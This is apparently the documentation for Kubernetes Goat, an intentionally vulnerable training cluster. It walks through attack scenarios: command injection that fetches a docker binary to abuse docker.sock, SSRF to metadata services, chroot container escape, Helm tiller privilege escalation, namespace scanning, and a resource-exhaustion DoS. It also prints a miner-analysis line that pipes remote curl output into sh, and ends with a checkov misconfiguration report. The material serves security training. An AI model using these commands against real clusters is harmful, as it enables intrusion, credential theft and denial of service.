Kubernetes Logo

About Kubernetes Goat

Kubernetes Goat is designed to be intentionally vulnerable cluster environment to learn and practice Kubernetes security.

Kubernetes Goat Home

Disclaimer & Warnings

Kubernetes Goat creates intentionally vulnerable resources into your cluster. DO NOT deploy Kubernetes Goat in a production environment or alongside any sensitive cluster resources.

Kubernetes Goat Scenarios

  1. Sensitive keys in code bases
  2. DIND(docker-in-docker) exploitation
  3. SSRF in K8S world
  4. Container escape to access host system
  5. Docker CIS Benchmarks analysis
  6. Kubernetes CIS Benchmarks analysis
  7. Attacking private registry
  8. NodePort exposed services
  9. Helm v2 tiller to PwN the cluster
  10. Analysing crypto miner container
  11. Kubernetes Namespaces bypass
  12. Gaining environment information
  13. DoS the memory/cpu resources
  14. Hacker Container preview

Kubernetes Goat Architecture

TBD

Author

Kubernetes Goat was created by Madhu Akula

Madhu Akula is a security ninja, published author and cloud native security researcher with an extensive experience. Also he is an active member of the international security, devops and cloud native communities (null, DevSecOps, AllDayDevOps, etc). Holds industry certifications like OSCP (Offensive Security Certified Professional), CKA (Certified Kubernetes Administrator), etc. Madhu frequently speaks and runs training sessions at security events and conferences around the world including DEFCON (24, 26 & 27), BlackHat USA (2018 & 19), USENIX LISA (2018 & 19), O’Reilly Velocity EU 2019, GitHub Satellite 2020, Appsec EU (2018 & 19), All Day DevOps (2016, 17, 18, 19 & 20), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n(2017, 18), Nullcon (2018, 19), SACON 2019, Serverless Summit, null and multiple others. His research has identified vulnerabilities in over 200+ companies and organisations including; Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP and Adobe, etc and credited with multiple CVE’s, Acknowledgements and rewards. He is co-author of Security Automation with Ansible2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. Also won 1st prize for building Infrastructure Security Monitoring solution at InMobi flagship hackathon among 100+ engineering teams.

Learning Kubernetes

Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google and is now maintained by the Cloud Native Computing Foundation. - Wikipedia

What is Kubernetes - The Illustrated Children's Guide to Kubernetes

The Illustrated Children's Guide to Kubernetes

source: https://www.youtube.com/watch?v=4ht22ReBjno

Kubernetes Overview

Kubernetes overview

Image source: Khtan66 CC BY-SA 4.0, from Wikimedia Commons

Resources to learn more about Kubernetes

Kubernetes Cluster Setup

Before we setup the Kubernetes Goat, we need to have working Kubernetes cluster admin access.

There are many ways you can run the Kubernetes Cluster. Some of them includes running in

  • Cloud provider Kubernetes service (like GKE, EKS, AKS, DO, etc.)
  • Locally provisioned cluster
  • Minikube environnement
  • Katacoda Playground

Refer to the Kubernetes setup documentation for more information and details at https://kubernetes.io/docs/setup/

Kubernetes playground by Katacoda

Kubernetes playground by Katacoda

https://katacoda.com/madhuakula/scenarios/kubernetes-goat

Google Kubernets Engine(GKE) Setup

  • Navigate to your Google cloud console https://console.cloud.google.com

  • Choose the project you want to setup the Kubernetes Cluster in Google Cloud

  • Then open the Google Cloud Shell. Click on the top right terminal icon

Creating new GKE cluster

# Importing requried environment varibales
export KUBERNETESGOATCLUSTERNAME="kubernetes-goat"
export KUBERNETESGOATREGION="us-central1"
export KUBERNETESGOATCLUSTERVERSION="1.16.8-gke.15"
export KUBERNETESGOATPROJECTNAME="<YOUR GOOGLE PROJECT ID>"

# Setup the GKE cluster
gcloud beta container --project "$KUBERNETESGOATPROJECTNAME" clusters create "$KUBERNETESGOATCLUSTERNAME" --zone "$KUBERNETESGOATREGION-a" --no-enable-basic-auth --cluster-version "$KUBERNETESGOATCLUSTERVERSION" --machine-type "n1-standard-1" --image-type "UBUNTU" --disk-type "pd-standard" --disk-size "50" --metadata disable-legacy-endpoints=true,GOAT_KEY="azhzLWdvYXQtNmJlNGRkMWI3ZmE4NGUzNzA0ODllZGQ2NDA0MWQ2MTk=" --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --preemptible --num-nodes "2" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/$KUBERNETESGOATPROJECTNAME/global/networks/default" --subnetwork "projects/$KUBERNETESGOATPROJECTNAME/regions/$KUBERNETESGOATREGION/subnetworks/default" --default-max-pods-per-node "110" --enable-autoscaling --min-nodes "1" --max-nodes "5" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --no-enable-autoupgrade --no-enable-autorepair --maintenance-window "03:00"

# Get the GKE cluster credentials to Google Cloud Shell
gcloud container clusters get-credentials $KUBERNETESGOATCLUSTERNAME --zone $KUBERNETESGOATREGION-a --project $KUBERNETESGOATPROJECTNAME
  • Check the kubernetes cluster access by running kubectl version --short

Miscellaneous

  • When you start the new project or creating Kubernetes cluster first time in GKE, it might take a while to enable the API. So you might see below error/message information.

Kubernetes Engine API is being enabled. This may take a minute or more. Learn more

Kubernetes Goat Setup

This document explains the steps to setup the Kubernetes Goat in your Kubernetes Cluster.

Please do not setup Kuberenetes Goat in your production workloads, as this is designed to be intentionally vulnerable.

Free online Kubernetes Goat playground

Kubernetes playground by Katacoda

https://katacoda.com/madhuakula/scenarios/kubernetes-goat

Pre-requisites

Setting up Kubernetes Goat

  • To setup the Kubernetes Goat resources in your cluster, run the following commands
git clone https://github.com/madhuakula/kubernetes-goat.git
cd kubernetes-goat
bash setup-kubernetes-goat.sh

Scenarios

Welcome to Kubernetes Goat Scenarios. This is the home for exploring your Kubernetes Goat scenarios, discovery, exploitation,attacks, endpoints, etc.

Ensure you have kubectl and docker binary installed in your host system to get maximum out of this training platform. Follow the each scenario by clicking on the each scenario.

Access the Kubernetes Goat environment resources

  • Ensure the pods are in running state before running the access script
kubectl get pods

all pods running in kubectl get pods

  • Run the following scrip to access the environment
bash access-kubernetes-goat.sh

Kubernetes Goat Home

Flags looks like below

The flag format looks like k8s-goat-2912d3d0b262bb16afbe450034089463

List of Scenarios

  1. Sensitive keys in code bases
  2. DIND(docker-in-docker) exploitation
  3. SSRF in K8S world
  4. Container escape to access host system
  5. Docker CIS Benchmarks analysis
  6. Kubernetes CIS Benchmarks analysis
  7. Attacking private registry
  8. NodePort exposed services
  9. Helm v2 tiller to PwN the cluster
  10. Analysing crypto miner container
  11. Kubernetes Namespaces bypass
  12. Gaining environment information
  13. DoS the memory/cpu resources
  14. Hacker Container preview

Sensitive keys in code bases

Scenario Information

Developers tend to commit sensitive information to version control systems. As we are moving towards CI/CD and GitOps systems, we tend to forgot identifying sensitive information in code and commits. Let's see if we can find something cool here!

Scenario 1 Entry

Scenario Solution

Method 1

After reading the scenario description and application information. We have performed some discovery and analysis, then identified that it has .git folder exposed with in the application.

Scenario 1 Git folder found

  • Clone the git repository locally by running the following command. Ensure you have setup git-dumper locally before running the below command
python3 git-dumper.py http://localhost:1230/.git k8s-goat-git

Scenario 1 git-dumper clone locally

  • Now check the git log information
cd k8s-goat-git
git log

Scenario 1 Git log history

  • Checkout to old commit to specific version
git checkout 128029d89797957957b2a7198d8d159b239b34eb
ls -la
cat .env

Scenario 1 Gain access to flag

Method 2

Sometimes, we ideally have access to the pods or containers access and we can also perform analysis from with in the container as well.

export POD_NAME=$(kubectl get pods --namespace default -l "app=build-code" -o jsonpath="{.items[0].metadata.name}")
kubectl exec -it $POD_NAME -- sh

Scenario 1 access to pod

  • Then we can perform analysis on .git folder by running utilities like trufflehog
trufflehog .

Scenario 1 trufflehog discovery

Miscellaneous

TBD

DIND(docker-in-docker) exploitation

Scenario Information

Most of the CI/CD and pipeline system which use Docker and build containers for you with in the pipeline use something called DIND (docker-in-docker). Here in this scenario, we try to exploit and gain access to host system.

  • To get started with the scenario, navigate to http://127.0.0.1:1231 and username is admin and password kubernetesgoat

Scenario 2 Login

Scenario 2 Home

Scenario Solution

  • By looking at application functionality, identified that it has command injection vulnerability
madhuakula.com; id

Scenario 2 Command Injection

  • After performing quite some analysis, identified the there is a docker.sock mount available in the file system
mount

Scenario 2 mount

;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz

Scenario 2 download docker binary

  • Extract the binary from the docker-19.03.9.tgz file
;tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/

Scenario 2 extract binary

  • Access he host system by running the following docker commands with docker.sock
;/tmp/docker/docker -H unix:///custom/docker/docker.sock ps
;/tmp/docker/docker -H unix:///custom/docker/docker.sock images

Scenario 2 extract binary

Miscellaneous

TBD

SSRF in K8S world

Scenario Information

SSRF (Server Side Request Forgery) vulnerability became the go-to attack for cloud native environments. Here in this scenario, we will see how we can exploit an application vulnerability like SSRF to gain access to cloud instance metadata as well as internal services metdata information.

Scenario 3 Welcome

Scenario Solution

Based on the description, we know that this application possibly vulnerable to the SSRF vulnerability. Let's go ahead and access the default instance metadata service using 169.254.169.254. Identify which cloud provider you are running this service, then use specific headers, and queries.

  • Let's also run and see what all ports running with in the same pod/container. Endpoint is http://127.0.0.1:5000 and method GET

Scenario 3 internal port

  • Now we can see that there is an internal-only exposed service with-in the cluster called http://metadata-db

Scenario 3 access metadata service

  • After enumerating through the entire key values, finally identified the flag at http://metadata-db/latest/secrets/kubernetes-goat

Scenario 3 access flag

  • Then decoding the base64 returns the flag as k8s-goat-ca90ef85db7a5aef0198d02fb0df9cab
echo -n "azhzLWdvYXQtY2E5MGVmODVkYjdhNWFlZjAxOThkMDJmYjBkZjljYWI=" | base64 -d

Scenario 3 decode base64

Miscellaneous

TBD

Container escape to access host system

Scenario Information

Most of the monitoring, tracing and debugging software require to run with extra privileges and capabilities. Here in this scenario, we will see a pod with extra capabilities and privileges including HostPath allows us to gain access to host system and provide Node level configuration to gain complete cluster compromise.

Scenario 4 Welcome

Scenario Solution

After performing the analysis, we identified that this container has complete privileges of host system and allowed privilege escalation. As well as /host-system is mounted from the host system.

ls /
ls /host-system/

Scenario 4 host system

  • Gaining the host system privileges access chroot
chroot /host-system bash
docker ps

Scenario 4 chroot host

  • Accessing the node level kubelet Kubernetes configuration
cat /var/lib/kubelet/kubeconfig

Scenario 4 kubelet config

Download the kubectl locally to use this config and perform operations

  • Using the kubelet configuration to perform Kubernetes cluster wide resources
kubectl --kubeconfig /var/lib/kubelet/kubeconfig get all -n kube-system

Scenario 4 get kube-system

  • From here we can go beyond by performing the lateral moment and post exploitation

Miscellaneous

TBD

Docker CIS Benchmarks analysis

Scenario Information

This scenario is mainly to perform the Docker CIS benchmarks analysis on top of Kubernetes nodes to identify the possible security vulnerabilities.

  • To get started with this scenario you can either access the node and perform by following docker bench security or run the following command to deploy docker bench security as a DaemonSet
kubectl apply -f scenarios/docker-bench-security/deployment.yaml
kubectl get daemonsets

Scenario 5 Docker bench DS

Scenario Solution

  • Access the each docker-bench-security-xxxxx pod based on how many nodes you have in Kubernetes cluster and run the Docker CIS benchmarks
kubectl exec -it docker-bench-security-xxxxx -- sh
cd docker-bench-security
  • Run the Docker CIS benchmarks script
sh docker-bench-security.sh

Scenario 5 Run Docker bench

  • Now based on the vulnerabilities you see from the Docker CIS benchmarks, you can proceed with further exploitation

Miscellaneous

TBD

Kubernetes CIS Benchmarks analysis

Scenario Information

This scenario is mainly to perform the Kubernetes CIS benchmarks analysis on top of Kubernetes nodes to identify the possible security vulnerabilities.

  • To get started with this scenario you can either access the node and perform by following kube-bench security or run the following command to deploy kube-bench as Kubernetes job
kubectl apply -f scenarios/kube-bench-security/node-job.yaml
kubectl apply -f scenarios/kube-bench-security/master-job.yaml

Scenario 6 Kube bench job

Scenario Solution

  • Now go ahead and get the jobs list and pods information by running the below commands
kubectl get jobs
kubectl logs -f kube-bench-node-xxxxx

Scenario 6 Kube bench output

  • Now based on the vulnerabilities you see from the Kubernetes CIS benchmarks, you can proceed with further exploitation

Miscellaneous

TBD

Attacking private registry

Scenario Information

Container registry is the place where all the container images gets pushed. Most of the time each organization have their own private registry. Also sometimes it ends up misconfigured, public/open. On the other hand, developers assumes that it's internal private registry only and end up storing all the sensitive information inside the container images. Let's see what we can find here.

Scenario 7 Welcome

Scenario Solution

As this is intentionally vulnerable design, we directly provided the endpoint. In real-world you have to do some recon.

  • Based on the scenario and information, we identified that it's possible docker container private registry

  • After reading some docs and googling, here is the simple API endpoint queries for the container registry

curl http://127.0.0.1:1235/v2/
curl http://127.0.0.1:1235/v2/_catalog

Scenario 7 image catalog

  • Get more information about the images inside the registry from the API using below queries
curl http://127.0.0.1:1235/v2/madhuakula/k8s-goat-users-repo/manifests/latest

Scenario 7 image info

  • Now, we observed that the docker container has ENV variable with API key information

Scenario 7 api key info

This can be taken little further by using docker client to download the images locally and analyzing. Also in some case you can even push the image to registry based on the permissions and privileges

Miscellaneous

TBD

NodePort exposed services

Scenario Information

If any of the user has exposed any service with in the Kubernetes cluster with NodePort. This means, if the nodes where the Kubernetes clusters running doesn't have any firewall/network security enabled. We ned seeing some unauthenticated an unauthorized services.

  • To get started with the scenario, run the following command and look for open ports in the Kubernetes Nodes
kubectl get nodes -o wide

When Kubernetes creates a NodePort service, it allocates a port from a range specified in the flags that define your Kubernetes cluster. (By default, these are ports ranging from 30000-32767.)

Scenario Solution

  • Get the list of Kubernetes nodes external IP addresses information
kubectl get nodes -o wide

Scenario 8 get nodes

  • Now, let's find out the open port. In this case you can use your traditional security scanning utilities like Nmap

  • Once we identified that there is a NodePort exposed, we can just verify by connecting to it and access

nc -zv EXTERNAL-IP-ADDRESS 30003

Scenario 8 access nodeport

This vulnerability/attack varies depends on how the Kubernetes cluster has been configured

Miscellaneous

TBD

Helm v2 tiller to PwN the cluster

Scenario Information

Helm is a package manager for Kubernetes. It's like apt-get for ubuntu. In this scenario, we will see the older version of helm (version 2), tiller service RBAC default setup to gain access to the completed cluster.

  • To get started with the scenario, run the following command
kubectl run --rm --restart=Never -it --image=madhuakula/k8s-goat-helm-tiller -- bash

Scenario 9 welcome

Scenario Solution

  • By default helm version 2 tiller deployment has RBAC with full cluster administrator privileges
  • So the default installation is in kube-system namespace with service name tiller-deploy and port 44134 exposed to 0.0.0.0. So we can verify by running telnet command
telnet tiller-deploy.kube-system 44134

Scenario 9 telnet

  • Now, we are able to connect to the tiller service port. We can use the helm binary to perform operations and talk to tiller service
helm --host tiller-deploy.kube-system:44134 version

Scenario 9 telnet

  • Let's try if we can get Kubernetes secrets from the cluster from kube-system namespace
kubectl get secrets -n kube-system

Scenario 9 before secrets

  • Now we can create our own helm chart to give permission to default service account full cluster admin access, as by default the current pod deployed in default namespace which has default service account
helm --host tiller-deploy.kube-system:44134 install --name pwnchart /pwnchart

Scenario 9 deploy chart

  • Now the pwnchart has been deployed, it has given all the default service accounts cluster admin access. Hence let's try getting the kube-system namespace secrets again
kubectl get secrets -n kube-system

Scenario 9 deploy chart

This scenario varies how the tiller deployment has been performed, sometimes admins deploy tiller to specific namespace with specific privilege. Also from Helm version 3 there is no tiller service to mitigate such vulnerabilities

Miscellaneous

Analysing crypto miner container

Scenario Information

Crypto mining has became popular with these modern infrastructure. Especially environments like Kubernetes is easy target as you might not event look what exactly the container image built upon and what it is doing with proactive monitoring. Here in this scenario, we will analyse and identify the crypto miner.

  • To get started, identify all the resources/images in the Kubernetes cluster. Including Jobs.
kubectl get jobs

Scenario 10 get jobs

Scenario Solution

Identify the all resources with in Kubernetes cluster. If possible get into details of each container image available in all the nodes with in the cluster as well

  • Once we have identified the job we ran in the Kubernetes cluster, got the pod information by running following command
kubectl describe job batch-check-job

Scenario 10 get job info

  • Then get the pod information by running the below command
kubectl get pods --namespace default -l "job-name=batch-check-job"
  • Then get the pod information manifest and analyse
kubectl get pod batch-check-job-xxxx -o yaml

Scenario 10 get pod info

  • Identified that it's running madhuakula/k8s-goat-batch-check docker image

  • After performing analysis of this image we identified it has the mining stuff in the build time script in one of the layer

docker history --no-trunc madhuakula/k8s-goat-batch-check

Scenario 10 get docker history

echo "curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup && chmod +x /usr/bin/system-startup

Miscellaneous

TBD

Kubernetes Namespaces bypass

Scenario Information

By default Kubernetes uses flat networking schema, which means any pod/service with in the cluster can talk to other. The namespaces with in the cluster doesn't have any network security restrictions by default. Anyone in the any namespace can talk to other namespace. We heard that Kubernetes-Goat loves cache. Let's see if we gain access to other namespaces

  • To get started with the scenario, let's run our awesome hacker-container in default namespace
kubectl run -it hacker-container --image=madhuakula/hacker-container -- sh

Scenario 11 Welcome

Scenario Solution

  • Get the cluster IP range information
ip route
ifconfig
printenv

Scenario 11 recon

  • Based on the analysis/understanding about the system. We can run the internal scan for the entire cluster range using zamp
zmap -p 6379 10.0.0.0/8 -o results.csv

Scenario 11 zmap Scenario 11 output ips

There is also another way to access the services/pods in the Kubernetes. For example servicename.namespace

  • Let's access the redis using the reds-cli client
redis-cli -h 10.12.0.2
KEYS * 
GET SECRETSTUFF

Scenario 11 redis access

There are many other services and resources exposed with in the cluster like ElasticSearch, Mongo, etc. So if your recon skill is good then you got gold mine here.

Miscellaneous

TBD

Gaining environment information

Scenario Information

Each environment in the Kubernetes will have lot of information to share. Some of the key things includes, secrets, apikeys, configs, services, many other. So let's go ahead and find the vault key!

Scenario 12 Welcome

Scenario Solution

  • Go ahead and explore the system as generic linux system
cat /proc/self/cgroup
cat /etc/hosts
mount
ls -la /home/

Scenario 12 explore

  • Getting the environment variables, including kubernetes secrets mounted K8S_GOAT_VAULT_KEY=k8s-goat-cd2da27224591da2b48ef83826a8a6c and service names, ports, etc.
printenv

Scenario 12 env

Miscellaneous

TBD

DoS the memory/cpu resources

Scenario Information

Whe there is no specification of resources in the Kubernetes manifests and not applied limit ranges for the containers. As an attacker we can consume all the resources where the pod/deployment running and starve other resources and cause a DoS for the environment.

Scenario 13 Welcome

Scenario Solution

  • This deployment pod has not set any resource limits in the Kubernetes manifests. So we can easily perform the bunch of operations which can consume resources
  • In this pod we have installed and ready to use utility called stress-ng
stress-ng --vm 2 --vm-bytes 2G --timeout 30s

Scenario 13 stress-ng

  • You can see the differece between while running stress-ng and after
kubectl top pod hunger-check-deployment-xxxxxxxxxx-xxxxx

Scenario 13 kubectl top

This attack may not work in some cases like autoscaling, resources restrictions, etc.

Miscellaneous

TBD

Hacker Container preview

Scenario Information

This scenario, is just an exploration of the common security utilities inside the Kubernetes Cluster environment. I think by this time you might have already used hacker-container multiple times.

  • To get started with this scenario. Run the hacker container using the below command
kubectl run -it hacker-container --image=madhuakula/hacker-container -- sh

Scenario 14 Welcome

Scenario Solution

Hacker Container is a utility with the list of useful tools/commands while hacking Kubernetes Clusters. So there is not limit to your exploration with Kubernetes environments. Here we will see some of the most useful and powerful utilities

  • Container introspection utility to get overview of the system capabilities, etc.
amicontained

Scenario 14 amicontained

  • Performing Nikto scan against internal services
nikto.pl -host http://metadata-db

Scenario 14 amicontained

There are many other use cases. To get the maximum out of hacker-container, we can use with host privileges, volumes, process, etc. Will be updated soon with more details.

Miscellaneous

TBD

Teardown Kubernetes Goat

  • Teardown the entire Kubernetes Goat infrastructure
bash teardown-kubernetes-goat.sh

Note: Ensure clean up what you installed and used, It's better to delete the cluster.

Security Scanning Reports

This section contains, security scanning reports by multiple open source security tools reports by scanning the Kubernetes Goat infrastructure.

checkov report for Kubernetes Goat

To identify all of the 232 kubernetes configuration issues run checkov by Bridgecrew

https://twitter.com/BarakSchoster/status/1273170904894377985

check_idfileresourcecheck_name
0CKV_K8S_31/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middlewareEnsure that the seccomp profile is set to docker/default or runtime/default
1CKV_K8S_40/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middlewareContainers should run as a high UID to avoid host conflict
2CKV_K8S_29/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middlewareApply security context to your pods and containers
3CKV_K8S_38/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middlewareEnsure that Service Account Tokens are only mounted where necessary
4CKV_K8S_23/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middlewareMinimize the admission of root containers
5CKV_K8S_37/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middleware (container 0)Minimize the admission of containers with capabilities assigned
6CKV_K8S_8/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middleware (container 0)Liveness Probe Should be Configured
7CKV_K8S_12/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middleware (container 0)Memory requests should be set
8CKV_K8S_20/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middleware (container 0)Containers should not run with allowPrivilegeEscalation
9CKV_K8S_13/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middleware (container 0)Memory limits should be set
10CKV_K8S_10/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middleware (container 0)CPU requests should be set
11CKV_K8S_22/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middleware (container 0)Use read-only filesystem for containers where possible
12CKV_K8S_9/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middleware (container 0)Readiness Probe Should be Configured
13CKV_K8S_28/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middleware (container 0)Minimize the admission of containers with the NET_RAW capability
14CKV_K8S_30/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middleware (container 0)Apply security context to your pods and containers
15CKV_K8S_14/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middleware (container 0)Image Tag should be fixed - not latest or blank
16CKV_K8S_43/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middleware (container 0)Image should use digest
17CKV_K8S_11/scenarios/cache-store/deployment.yamlDeployment.cache-store-deployment.secure-middleware (container 0)CPU limits should be set
18CKV_K8S_31/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
19CKV_K8S_40/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.defaultContainers should run as a high UID to avoid host conflict
20CKV_K8S_29/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.defaultApply security context to your pods and containers
21CKV_K8S_38/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.defaultEnsure that Service Account Tokens are only mounted where necessary
22CKV_K8S_21/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.defaultThe default namespace should not be used
23CKV_K8S_23/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.defaultMinimize the admission of root containers
24CKV_K8S_21/scenarios/build-code/deployment.yamlService.build-code-service.defaultThe default namespace should not be used
25CKV_K8S_37/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.default (container 0)Minimize the admission of containers with capabilities assigned
26CKV_K8S_8/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.default (container 0)Liveness Probe Should be Configured
27CKV_K8S_12/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.default (container 0)Memory requests should be set
28CKV_K8S_20/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.default (container 0)Containers should not run with allowPrivilegeEscalation
29CKV_K8S_10/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.default (container 0)CPU requests should be set
30CKV_K8S_22/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.default (container 0)Use read-only filesystem for containers where possible
31CKV_K8S_9/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.default (container 0)Readiness Probe Should be Configured
32CKV_K8S_28/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.default (container 0)Minimize the admission of containers with the NET_RAW capability
33CKV_K8S_30/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.default (container 0)Apply security context to your pods and containers
34CKV_K8S_14/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.default (container 0)Image Tag should be fixed - not latest or blank
35CKV_K8S_43/scenarios/build-code/deployment.yamlDeployment.build-code-deployment.default (container 0)Image should use digest
36CKV_K8S_31/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
37CKV_K8S_27/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.defaultDo not expose the docker daemon socket to containers
38CKV_K8S_40/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.defaultContainers should run as a high UID to avoid host conflict
39CKV_K8S_19/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.defaultContainers should not share the host network namespace
40CKV_K8S_17/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.defaultContainers should not share the host process ID namespace
41CKV_K8S_18/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.defaultContainers should not share the host IPC namespace
42CKV_K8S_38/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.defaultEnsure that Service Account Tokens are only mounted where necessary
43CKV_K8S_21/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.defaultThe default namespace should not be used
44CKV_K8S_23/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.defaultMinimize the admission of root containers
45CKV_K8S_37/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.default (container 0)Minimize the admission of containers with capabilities assigned
46CKV_K8S_8/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.default (container 0)Liveness Probe Should be Configured
47CKV_K8S_20/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.default (container 0)Containers should not run with allowPrivilegeEscalation
48CKV_K8S_16/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.default (container 0)Container should not be privileged
49CKV_K8S_22/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.default (container 0)Use read-only filesystem for containers where possible
50CKV_K8S_9/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.default (container 0)Readiness Probe Should be Configured
51CKV_K8S_28/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.default (container 0)Minimize the admission of containers with the NET_RAW capability
52CKV_K8S_25/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.default (container 0)Minimize the admission of containers with added capability
53CKV_K8S_14/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.default (container 0)Image Tag should be fixed - not latest or blank
54CKV_K8S_43/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.default (container 0)Image should use digest
55CKV_K8S_31/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
56CKV_K8S_40/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.defaultContainers should run as a high UID to avoid host conflict
57CKV_K8S_29/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.defaultApply security context to your pods and containers
58CKV_K8S_38/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.defaultEnsure that Service Account Tokens are only mounted where necessary
59CKV_K8S_21/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.defaultThe default namespace should not be used
60CKV_K8S_23/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.defaultMinimize the admission of root containers
61CKV_K8S_21/scenarios/kubernetes-goat-home/deployment.yamlService.kubernetes-goat-home-service.defaultThe default namespace should not be used
62CKV_K8S_37/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Minimize the admission of containers with capabilities assigned
63CKV_K8S_8/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Liveness Probe Should be Configured
64CKV_K8S_12/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Memory requests should be set
65CKV_K8S_20/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Containers should not run with allowPrivilegeEscalation
66CKV_K8S_10/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)CPU requests should be set
67CKV_K8S_22/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Use read-only filesystem for containers where possible
68CKV_K8S_9/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Readiness Probe Should be Configured
69CKV_K8S_28/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Minimize the admission of containers with the NET_RAW capability
70CKV_K8S_30/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Apply security context to your pods and containers
71CKV_K8S_14/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Image Tag should be fixed - not latest or blank
72CKV_K8S_43/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Image should use digest
73CKV_K8S_31/scenarios/batch-check/job.yamlJob.batch-check-job.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
74CKV_K8S_40/scenarios/batch-check/job.yamlJob.batch-check-job.defaultContainers should run as a high UID to avoid host conflict
75CKV_K8S_29/scenarios/batch-check/job.yamlJob.batch-check-job.defaultApply security context to your pods and containers
76CKV_K8S_38/scenarios/batch-check/job.yamlJob.batch-check-job.defaultEnsure that Service Account Tokens are only mounted where necessary
